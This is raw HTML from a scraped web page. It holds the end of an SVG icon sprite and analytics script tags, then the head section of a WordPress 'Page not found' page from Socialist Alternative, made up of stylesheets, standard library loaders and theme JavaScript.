1.15.07 1 .1.85.1.65.12.45.08zm2 .12q0 3.73-1.84 6.88t-5 5-6.9 1.83-6.87-1.83-5-5T0 16t1.84-6.88 5-5T13.7 2.3t6.88 1.83 5 5T27.42 16z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M20.95 18.98q0-.9-.35-1.63t-.87-1.23-1.3-.87-1.47-.6-1.57-.42l-1.86-.43q-.54-.12-.8-.18t-.62-.2-.53-.3-.3-.37-.14-.54q0-1.36 2.57-1.36.77 0 1.38.2t.97.52.68.6.7.52.87.2q.84 0 1.35-.56t.5-1.37q0-1-1-1.78t-2.53-1.2-3.25-.42q-1.22 0-2.37.28t-2.13.84-1.6 1.55-.6 2.3q0 1.1.35 1.9t1 1.35 1.43.86 1.84.58l2.6.66q1.6.4 2 .64.58.36.58 1.07 0 .7-.72 1.15t-1.87.46q-.9 0-1.63-.3t-1.16-.68-.8-.8-.82-.7-.96-.27q-.9 0-1.35.53T6.7 20.3q0 1.64 2.2 2.8t5.2 1.18q1.3 0 2.5-.33t2.18-.95 1.58-1.67.58-2.35zm6.48 3.88q0 2.84-2 4.84t-4.86 2q-2.32 0-4.18-1.42-1.38.3-2.7.3-2.54 0-4.87-1T4.8 24.9t-2.67-4.02-1-4.88q0-1.3.3-2.68Q0 11.46 0 9.14 0 6.3 2 4.3t4.86-2.02q2.32 0 4.17 1.43 1.38-.27 2.68-.27 2.57 0 4.9 1t4.02 2.67 2.67 4.02 1 4.88q0 1.3-.3 2.68 1.43 1.86 1.43 4.18z" class="path1"/></symbol><symbol viewBox="0 0 23 32"><path d="M17.86 7.75l.66-3.46q.1-.43-.16-.73t-.63-.3H5.03q-.42 0-.7.3t-.28.66V23.9q0 .12.1 0l5.2-6.27q.42-.47.68-.6t.86-.14h4.26q.4 0 .66-.26t.32-.53q.43-2.3.66-3.4.07-.38-.2-.72t-.65-.34H10.7q-.52 0-.86-.33t-.34-.85V9.7q0-.52.34-.85t.86-.33h6.18q.32 0 .62-.24t.36-.53zM21.9 3.8q-.26 1.3-.94 4.75t-1.24 6.24-.63 3.1q-.12.4-.17.57t-.25.58-.44.6-.7.37-1.02.18h-4.84q-.23 0-.4.17-.14.17-7.6 8.83-.4.44-1.05.5t-.86-.1Q.8 29.2.8 27.87V2.68q0-.98.66-1.83T3.6 0h15.86q1.7 0 2.27.95t.18 2.83zm0 0l-2.8 14.1q.06-.3.6-3.1t1.26-6.25.95-4.76z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M2.27 16q0-2.9 1.2-5.6L10 28.37q-3.5-1.7-5.63-5.02T2.26 16zm23-.7q0 .34-.05.7t-.18.88-.2.78-.3 1.06-.33 1.03l-1.34 4.57L17.9 9.57q.8-.05 1.56-.14.34-.04.47-.33t-.05-.55-.5-.25l-3.67.18q-1.33 0-3.6-.18-.2 0-.36.1t-.2.26-.03.33.17.3.35.13l1.43.14 2.14 5.86-3 9-5-14.86q.8-.05 1.56-.14.34-.04.46-.33t-.04-.55-.5-.24L5.4 8.5q-.12 0-.4 0t-.47 0Q6.4 5.6 9.43 3.93T16 2.27q2.62 0 5 .95t4.27 2.66h-.18q-1 0-1.66.72t-.66 1.7q0 .22.04.43t.07.4.13.4.16.37.2.4.23.38.26.43.24.42q1.13 1.9 1.13 3.8zm-9.04 1.9l4.23 11.55q.02.1.1.2-2.26.78-4.56.78-2 0-3.88-.57zm11.8-7.8q1.7 3.12 1.7 6.6 0 3.73-1.85 6.88t-5 4.98l4.2-12.1q1.06-3.03 1.06-4.94 0-.75-.1-1.4zM16 0q3.25 0 6.2 1.27t5.12 3.4 3.4 5.12T32 16t-1.27 6.2-3.4 5.12-5.12 3.4T16 32t-6.2-1.27-5.12-3.4-3.4-5.12T0 16t1.27-6.2 3.4-5.12 5.12-3.4T16 0zm0 31.27q3.1 0 5.92-1.22t4.88-3.25 3.25-4.88T31.27 16t-1.22-5.92T26.8 5.2t-4.88-3.25T16 .73t-5.92 1.22T5.2 5.2 1.96 10.1.73 16t1.22 5.92T5.2 26.8t4.88 3.25T16 31.27z" class="path1"/></symbol><symbol viewBox="0 0 34 32"><path d="M18.96 12.7v-2.1q0-.74-.53-1.28t-1.3-.54-1.27.54-.54 1.3v10.92q0 3.12-2.25 5.34t-5.4 2.2q-3.2 0-5.43-2.23T0 21.43v-4.75h5.85v4.68q0 .76.54 1.3t1.28.52 1.28-.53.54-1.3V10.3q0-3.07 2.26-5.23t5.38-2.16q3.14 0 5.4 2.2t2.24 5.24v2.43L21.3 13.8zm9.47 3.98h5.86v4.75q0 3.18-2.25 5.42t-5.42 2.24q-3.17 0-5.42-2.23t-2.24-5.37v-4.8l2.34 1.1 3.48-1.03v4.82q0 .74.54 1.27t1.3.52 1.27-.53.53-1.28v-4.92z" class="path1"/></symbol><symbol viewBox="0 0 37 32"><path d="M5.86 5.04H9.5V22.6H0V10.13h5.86v-5.1zm0 14.62v-6.6h-2.2v6.6h2.2zm5.1-9.52V22.6h3.66V10.13h-3.66zm0-5.1v3.64h3.66V5.04h-3.66zm5.13 5.1h9.5v16.82h-9.5v-2.9h5.85v-1.47H16.1V10.13zm5.85 9.52v-6.6h-2.2v6.6h2.2zm5.12-9.52h9.5v16.82h-9.5v-2.9h5.84v-1.47h-5.83V10.13zm5.84 9.52v-6.6h-2.18v6.6h2.2z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M20.13 21.6q0-.56-.54-.9-3.46-2.06-8-2.06-2.37 0-5.12.6-.75.17-.75.94 0 .35.24.6t.64.27q.1 0 .67-.14 2.35-.47 4.34-.47 4.04 0 7.1 1.84.33.2.58.2.34 0 .6-.25t.24-.6zm1.7-3.83q0-.72-.62-1.1-4.22-2.5-9.77-2.5-2.73 0-5.4.74-.87.24-.87 1.15 0 .45.3.76t.77.33q.13 0 .66-.15 2.17-.6 4.47-.6 5 0 8.72 2.23.42.24.67.24.44 0 .76-.3t.3-.77zm1.94-4.43q0-.84-.72-1.25-2.25-1.3-5.23-1.98t-6.12-.67q-3.65 0-6.5.84-.4.1-.7.44t-.27.87q0 .56.37.94t.92.37q.2 0 .7-.13 2.4-.66 5.5-.66 2.83 0 5.52.6t4.53 1.7q.37.22.7.22.53 0 .9-.36t.4-.92zM27.43 16q0 3.73-1.84 6.88t-5 5-6.9 1.83-6.87-1.83-5-5T0 16t1.84-6.88 5-5T13.7 2.3t6.88 1.83 5 5T27.42 16z" class="path1"/></symbol><symbol viewBox="0 0 41 32"><path d="M14 24.5l.3-4.3-.3-9.34q-.02-.18-.13-.3t-.3-.13q-.16 0-.3.12t-.1.3l-.26 9.35.26 4.3q.02.18.13.3t.27.1q.4 0 .43-.4zm5.3-.52l.18-3.77-.2-10.45q0-.3-.24-.43-.15-.1-.3-.1t-.28.1q-.23.14-.23.43l-.02.1-.16 10.35q0 0 .2 4.2v.03q0 .18.1.3.16.2.4.2.2 0 .37-.16.17-.13.17-.36zM.6 17.9l.36 2.3-.35 2.25q-.04.16-.17.16t-.16-.15L0 20.2l.3-2.3q.04-.15.16-.15t.16.16zm1.54-1.4l.46 3.7-.46 3.62q-.04.16-.18.16-.16 0-.16-.18l-.4-3.6.4-3.7q0-.16.16-.16.14 0 .18.16zm1.64-.68l.45 4.38-.45 4.23q0 .2-.2.2-.17 0-.2-.2L3 20.2l.37-4.38q.03-.2.2-.2.2 0 .2.2zm1.68-.12l.4 4.5-.4 4.35q-.03.23-.25.23-.23 0-.23-.23l-.38-4.35.38-4.5q0-.24.23-.24.22 0 .25.24zm1.68.32l.38 4.18-.38 4.4q-.04.28-.3.28-.1 0-.17-.08t-.1-.2l-.35-4.4.36-4.18q0-.1.1-.2t.18-.07q.25 0 .28.27zm1.68-2.6l.37 6.78-.36 4.4q0 .1-.1.2t-.2.1q-.3 0-.32-.3l-.33-4.4.3-6.8q.05-.3.34-.3.12 0 .2.1t.1.2zm1.68-1.54l.34 8.35-.34 4.36q0 .13-.1.23t-.24.1q-.32 0-.36-.34l-.28-4.37.28-8.36q.04-.33.36-.33.14 0 .24.1t.1.23zm1.75-.72l.32 9.04-.33 4.32q-.04.37-.4.37-.33 0-.37-.38l-.3-4.32.3-9.04q0-.16.12-.28t.26-.1q.16 0 .26.1t.13.28zm7 13.25zm-3.54-13.3l.27 9.1-.27 4.26q0 .18-.13.32t-.32.13-.3-.1-.14-.34l-.25-4.26.24-9.1q0-.2.13-.33t.3-.13.33.13.13.32zm1.77.33l.25 8.79-.25 4.2q0 .2-.14.35t-.34.14-.34-.13-.16-.34l-.22-4.2.22-8.8q.02-.2.16-.36t.34-.14.33.14.15.36zm3.8 8.78l-.26 4.14q0 .23-.16.4t-.4.15-.4-.17-.17-.4l-.1-2.03-.1-2.1.2-11.34V8.8q.05-.27.22-.43.16-.12.36-.12.14 0 .27.1.25.13.28.45zm19.84-.32q0 2.08-1.48 3.56T36.1 24.9H22.04q-.23-.03-.4-.2t-.15-.38V8.27q0-.4.5-.6 1.52-.6 3.23-.6 3.48 0 6.04 2.35t2.86 5.78q.94-.4 1.96-.4 2.08 0 3.56 1.5t1.48 3.57z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M3.86 20.88l10.77 7.17v-6.4l-5.97-4zm-1.1-2.58L6.2 16l-3.45-2.3v4.6zm14.62 9.75l10.76-7.18-4.8-3.2-5.97 3.97v6.4zM16 19.25L20.86 16 16 12.75 11.14 16zm-7.34-4.9l5.96-4v-6.4L3.87 11.12zM25.8 16l3.45 2.3v-4.6zm-2.46-1.66l4.8-3.2-10.77-7.2v6.42zm8.66-3.2v9.73q0 .74-.6 1.15l-14.63 9.75Q16.4 32 16 32t-.77-.23L.6 22.02q-.6-.4-.6-1.14v-9.75q0-.74.6-1.15L15.24.23Q15.6 0 16 0t.77.23L31.4 9.98q.6.4.6 1.14z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M16 7.75v7.75h-2.6V7.75H16zm7.1 0v7.75h-2.58V7.75h2.6zm0 13.57l4.52-4.53V2.6H6.3V21.3h5.82v3.88L16 21.32h7.1zM30.2 0v18.1l-7.74 7.74h-5.82l-3.87 3.87H8.9v-3.86H1.8V5.16L3.72 0H30.2z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M23.4 15.04v2.03q0 .43-.23.68t-.67.25h-3.6q-.44 0-.7-.25t-.24-.68v-2.03q0-.43.25-.68t.7-.25h3.6q.43 0 .67.26t.24.68zm-8.74 4.1v-4.46q0-.95-.58-1.53t-1.53-.58h-2.37q-1.2 0-1.7.93-.52-.93-1.73-.93H4.43q-.95 0-1.53.58t-.58 1.53v4.46q0 .4.38.4h.98q.4 0 .4-.4v-4.1q0-.43.23-.68t.7-.25h1.68q.43 0 .68.26t.25.68v4.1q0 .4.38.4h.97q.4 0 .4-.4v-4.1q0-.43.24-.68t.67-.25H12q.43 0 .67.26t.24.68v4.1q0 .4.4.4h1q.36 0 .36-.4zm10.52-1.7v-2.76q0-.95-.6-1.53t-1.53-.58h-4.7q-.96 0-1.55.58t-.6 1.53V22q0 .38.4.38h1q.36 0 .36-.38v-3.2q.56.74 1.68.74h3.4q.96 0 1.55-.58t.58-1.53zm2.25-11v19.13q0 1.72-1.22 2.93t-2.9 1.22H4.13q-1.7 0-2.93-1.22T0 25.57V6.43q0-1.7 1.2-2.93t2.94-1.2H23.3q1.7 0 2.92 1.2t1.2 2.93z" class="path1"/></symbol><symbol viewBox="0 0 23 32"><path d="M0 10.66q0-1.93.67-3.63t1.85-2.98 2.7-2.2T8.55.46t3.6-.45q2.82 0 5.25 1.2t3.94 3.44 1.52 5.13q0 1.7-.34 3.36t-1.07 3.16-1.8 2.66-2.58 1.84-3.37.68q-1.22 0-2.4-.57t-1.73-1.56q-.18.7-.5 2t-.42 1.7-.36 1.27-.48 1.28-.57 1.12-.82 1.38-1.1 1.55l-.26.1-.16-.2q-.26-2.8-.26-3.35 0-1.64.4-3.7t1.18-5.12.93-3.63q-.58-1.16-.58-3 0-1.5.93-2.8t2.36-1.3q1.1 0 1.7.72t.6 1.83q0 1.18-.78 3.4t-.8 3.35q0 1.12.82 1.87t1.94.74q.98 0 1.82-.45t1.4-1.22 1-1.7.68-1.97.36-1.97.12-1.78q0-3.1-1.96-4.8t-5.1-1.74Q8.1 2.9 5.7 5.24T3.3 11.1q0 .78.23 1.5T4 13.78t.5.8.22.56q0 .5-.27 1.3t-.66.8q-.05 0-.32-.05-.9-.27-1.6-1t-1.1-1.7-.58-1.9-.2-1.92z" class="path1"/></symbol><symbol viewBox="0 0 31 32"><path d="M27.95 2.3q1.16 0 1.96.8t.8 1.97v9.27q0 3.14-1.2 6t-3.26 4.9-4.9 3.27-5.97 1.2q-3.14 0-6-1.2t-4.9-3.25-3.26-4.9-1.2-6V5.06Q0 3.93.82 3.1t1.97-.8h25.15zm-12.57 19q.83 0 1.46-.6l7.2-6.93q.67-.63.67-1.52 0-.87-.6-1.5t-1.5-.6q-.83 0-1.46.58l-5.76 5.54-5.77-5.54q-.62-.6-1.44-.6-.87 0-1.5.63t-.6 1.5q0 .9.64 1.5l7.23 6.94q.6.6 1.45.6z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M30.52 9.25q-.18 4.2-5.93 11.63-5.96 7.7-10.05 7.7-2.53 0-4.28-4.7-.8-2.86-2.36-8.6-1.28-4.7-2.8-4.7-.3 0-2.26 1.37L1.46 10.2q.43-.38 1.93-1.73T5.7 6.4q2.8-2.45 4.32-2.6 1.7-.16 2.73 1t1.45 3.63q.78 5.12 1.17 6.66 1 4.43 2.15 4.43.9 0 2.75-2.87 1.8-2.88 1.94-4.4.25-2.48-1.93-2.48-1.02 0-2.16.47 2.15-7.02 8.2-6.82 4.48.14 4.22 5.82z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M32 15.1q0 1.04-.53 1.9t-1.42 1.3q.22.8.22 1.7 0 2.77-1.9 5.13t-5.2 3.72-7.14 1.36-7.13-1.35-5.18-3.73T1.82 20q0-.84.2-1.68-.92-.44-1.47-1.3T0 15.1q0-1.48 1.03-2.52t2.52-1.05q1.52 0 2.6 1.13 3.88-2.72 9.2-2.9L17.4.48q.06-.23.27-.37t.47-.08l6.6 1.44q.3-.66.95-1.06t1.4-.4q1.1 0 1.9.77t.78 1.9T29 4.54t-1.9.8-1.88-.8-.78-1.87l-5.96-1.32-1.86 8.42q5.36.17 9.27 2.86 1.02-1.1 2.54-1.1 1.48 0 2.52 1.06T32 15.1zM7.46 18.67q0 1.1.78 1.9t1.88.78 1.9-.8.78-1.88-.78-1.88-1.9-.78q-1.08 0-1.87.8t-.8 1.86zM21.93 25q.2-.2.2-.46t-.2-.47q-.18-.18-.45-.18t-.46.17q-.73.75-2.16 1.1t-2.86.37-2.86-.36-2.16-1.1q-.2-.2-.46-.2t-.45.2q-.2.17-.2.45t.2.47q.77.77 2.12 1.2t2.18.54 1.62.08 1.63-.08 2.19-.53 2.1-1.2zm-.05-3.66q1.1 0 1.88-.8t.78-1.88q0-1.1-.8-1.88T21.9 16q-1.1 0-1.9.78t-.78 1.88.78 1.9 1.9.78z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M17.7 18.3l1.14-4.58H14.3l-1.14 4.57h4.54zm13.7-9l-1 4q-.1.4-.54.4h-5.84l-1.14 4.6h5.55q.27 0 .45.2.17.25.1.5l-1 4q-.1.43-.55.43H21.6l-1.46 5.86q-.12.4-.55.4h-4q-.3 0-.47-.2-.17-.2-.1-.5l1.38-5.57H11.9l-1.45 5.86q-.13.42-.55.42H5.86q-.27 0-.45-.22-.15-.2-.1-.5l1.4-5.57H1.14q-.26 0-.44-.2-.16-.23-.1-.5l1-4q.12-.44.54-.44h5.84l1.15-4.58H3.57q-.27 0-.44-.22-.18-.25-.1-.5l1-4q.08-.43.54-.43h5.84l1.46-5.85q.12-.43.57-.43h4q.27 0 .45.2.16.22.1.5l-1.4 5.57h4.55l1.44-5.85q.13-.43.57-.43h4q.27 0 .45.2.15.22.1.5l-1.4 5.57h5.56q.26 0 .44.22.16.2.1.5z" class="path1"/></symbol><symbol viewBox="0 0 30 32"><path d="M26 21.7q0-.7-.5-1.2l-3.7-3.7q-.5-.5-1.23-.5-.75 0-1.28.56.04.05.33.33t.38.37.28.34.23.47.07.5q0 .7-.5 1.2t-1.2.5q-.28 0-.5-.06t-.46-.23-.33-.26-.38-.38-.34-.34q-.6.56-.6 1.3 0 .72.5 1.22l3.7 3.7q.47.48 1.2.48.72 0 1.22-.46l2.62-2.6q.5-.5.5-1.2zM13.45 9.14q0-.72-.5-1.22L9.27 4.2q-.5-.5-1.22-.5-.7 0-1.2.5L4.2 6.8q-.5.5-.5 1.2t.5 1.2l3.73 3.73q.48.48 1.2.48.76 0 1.3-.54-.06-.06-.34-.33t-.4-.4-.26-.33-.24-.45-.06-.5q0-.7.5-1.2t1.22-.5q.26 0 .5.06t.44.24.34.27.38.4.33.33q.6-.55.6-1.3zM29.43 21.7q0 2.16-1.52 3.64l-2.6 2.6q-1.5 1.5-3.64 1.5-2.16 0-3.64-1.53l-3.68-3.7q-1.48-1.47-1.48-3.6 0-2.2 1.57-3.74l-1.57-1.57q-1.54 1.56-3.72 1.56-2.14 0-3.64-1.5l-3.7-3.72Q.3 10.14.3 8t1.5-3.63l2.63-2.6Q5.9.3 8.05.3q2.16 0 3.65 1.5l3.68 3.7q1.48 1.48 1.48 3.62 0 2.2-1.57 3.74l1.56 1.57q1.53-1.57 3.7-1.57 2.16 0 3.66 1.5l3.7 3.7q1.5 1.5 1.5 3.65z" class="path1"/></symbol><symbol viewBox="0 0 21 32"><path d="M8.57 15.43v-8q0-.25-.16-.4T8 6.85t-.4.16-.17.4v8q0 .26.16.42T8 16t.4-.16.17-.4zm12 6.28q0 .48-.34.82t-.8.34h-7.66l-.9 8.62q-.05.22-.2.37t-.37.15h-.02q-.48 0-.57-.48l-1.34-8.66H1.14q-.46 0-.8-.34t-.34-.8q0-2.2 1.4-3.96T4.57 16V6.86q-.93 0-1.6-.68t-.68-1.6.66-1.62 1.6-.68H16q.93 0 1.6.68t.7 1.6-.7 1.62-1.6.68V16q1.77 0 3.17 1.76t1.4 3.95z" class="path1"/></symbol><symbol viewBox="0 0 43 32"><path d="M42.3 14.04c-.17-.17-.52-.35-.7-.35H7.82l10.3-10.5c.2-.18.37-.53.37-.7 0-.37-.2-.55-.37-.72L16.53.36C16.18.18 16 0 15.63 0s-.52.18-.7.36L.36 15.29c-.18.17-.36.52-.36.7s.18.53.36.7L15.1 31.65c0 .18.37.36.54.36s.54-.18.72-.36l1.6-1.6c.17-.17.35-.53.35-.7s-.17-.54-.34-.72L7.64 18.12h33.78c.18 0 .53-.17.7-.34.37-.18.55-.36.55-.72v-2.13c0-.35-.18-.7-.36-.9z" class="path1"/></symbol><symbol viewBox="0 0 43 32"><path d="M.36 17.96c.17.17.53.35.7.35h33.78l-10.3 10.5c-.18.18-.36.53-.36.7 0 .37.18.55.35.72l1.6 1.6c.18.18.54.36.72.36s.53-.18.7-.36L42.32 16.9c.2-.37.37-.72.37-.9s-.18-.53-.36-.7L27.57.35c0-.18-.36-.36-.54-.36s-.53.18-.7.36l-1.6 1.6c-.2.18-.36.53-.36.7s.17.54.35.72l10.32 10.5H1.24c-.17 0-.53.17-.7.34-.36.18-.54.36-.54.72v2.3c0 .18.18.54.36.72z" class="path1"/></symbol><symbol viewBox="0 0 22 28"><path d="M21.63 14.48L.88 26.02c-.5.26-.88.03-.88-.52v-23c0-.55.4-.78.88-.52L21.63 13.5c.48.28.48.72 0 .98z"/></symbol><symbol viewBox="0 0 24 28"><path d="M24 3v22c0 .55-.45 1-1 1h-8c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1h8c.55 0 1 .45 1 1zM10 3v22c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1h8c.55 0 1 .45 1 1z"/></symbol></defs></svg><script type="text/javascript" src="https://load.fomo.com/api/v1/taYEiFnSLCnK9MBbVUF2ug/load.js" async></script> <script type="text/javascript" src="https://a.optmnstr.com/app/js/api.min.js" data-account="48696" data-user="42822" async></script> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"9b0960e314","applicationID":"111459018","transactionName":"ZVVXYUAFCkFRBhYPXFwfdFZGDQtcHwMQCV1GHUVUVQE=","queueTime":0,"applicationTime":1748,"atts":"SRJUFwgfGU8=","errorBeacon":"bam.nr-data.net","agent":""}</script></body></html>
0
<!doctype html > <!--[if IE 8]> <html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]--> <head> <title>Page not found | Socialist Alternative</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://www.socialistalternative.org/xmlrpc.php" /> <!-- Social Warfare v3.5.4 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.4");src:url("https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.4#iefix") format("embedded-opentype"),url("https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.4") format("woff"), url("https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.4") format("truetype"),url("https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.4#1445203416") format("svg");font-weight: normal;font-style: normal;}</style> <!-- Social Warfare v3.5.4 https://warfareplugins.com --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Socialist Alternative &raquo; Feed" href="https://www.socialistalternative.org/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.socialistalternative.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='social-warfare-block-css-css' href='https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.socialistalternative.org/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.5.7' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.5.7' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='social_warfare-css' href='https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.4' type='text/css' media='all' /> <link rel='stylesheet' id='td-plugin-multi-purpose-css' href='https://www.socialistalternative.org/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=618b370f2556e74c489bd6592378277f' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A400%2C300%2C700%7COpen+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%2C300%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=9.5' type='text/css' media='all' /> <link rel='stylesheet' id='recent-posts-widget-with-thumbnails-public-style-css' href='https://www.socialistalternative.org/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css?ver=6.4.0' type='text/css' media='all' /> <link rel='stylesheet' id='td-theme-css' href='https://www.socialistalternative.org/wp-content/themes/Newspaper/style.css?ver=9.5' type='text/css' media='all' /> <link rel='stylesheet' id='td-theme-woo-css' href='https://www.socialistalternative.org/wp-content/themes/Newspaper/style-woocommerce.css?ver=9.5' type='text/css' media='all' /> <link rel='stylesheet' id='td-theme-demo-style-css' href='https://www.socialistalternative.org/wp-content/themes/Newspaper/includes/demos/city_news/demo_style.css?ver=9.5' type='text/css' media='all' /> <link rel='stylesheet' id='tdb_front_style-css' href='https://www.socialistalternative.org/wp-content/plugins/td-cloud-library/assets/css/tdb_less_front.css?ver=726837bbdee984ffb331a234aadde124' type='text/css' media='all' /> <script type='text/javascript' src='https://www.socialistalternative.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://www.socialistalternative.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.socialistalternative.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.socialistalternative.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <meta name="generator" content="WooCommerce 3.5.7" /> <!-- start Simple Custom CSS and JS --> <style type="text/css"> /* Morgan Q Shop styling */ .woocommerce ul.products li.product .woocommerce-loop-product__title { font-size:1.5em; } .woocommerce ul.products li.product .price { font-size:1.25em; } .summary p { border:0; color:#555; background-color:transparent; } .sku_wrapper { display:none; } .woocommerce div.product .woocommerce-tabs { display:none; } section.related { clear:both; } section.related h2 { padding-bottom:15px; } .td-city .footer-logo-wrap img { max-width:100%; } .td-header-template-wrap { margin-bottom:15px; } .td-module-meta-info { font-size:13pt; } .wp-block-quote.is-style-large p{ color:#000; text-transform:none; font-size:14pt; } </style> <!-- end Simple Custom CSS and JS --> <!-- OneAll.com / Social Login for WordPress / v5.4.4 --> <script data-cfasync="false" type="text/javascript"> (function() { var oa = document.createElement('script'); oa.type = 'text/javascript'; oa.async = true; oa.src = 'https://socialistalternativeorg.api.oneall.com/socialize/library.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(oa, s); })(); </script> <script> window.tdb_globals = {"wpRestNonce":"e07d99f370","wpRestUrl":"https:\/\/www.socialistalternative.org\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%day%\/%postname%\/","isAdminBarShowing":false,"origPostEditUrl":null}; </script> <script> window.tdwGlobal = {"adminUrl":"https:\/\/www.socialistalternative.org\/wp-admin\/","wpRestNonce":"e07d99f370","wpRestUrl":"https:\/\/www.socialistalternative.org\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%day%\/%postname%\/"}; </script> <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]--> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <!-- JS generated by theme --> <script> var tdBlocksArray = []; //here we store all the items for the current page //td_block class - each ajax block uses a object of this class for requests function tdBlock() { this.id = ''; this.block_type = 1; //block type id (1-234 etc) this.atts = ''; this.td_column_number = ''; this.td_current_page = 1; // this.post_count = 0; //from wp this.found_posts = 0; //from wp this.max_num_pages = 0; //from wp this.td_filter_value = ''; //current live filter value 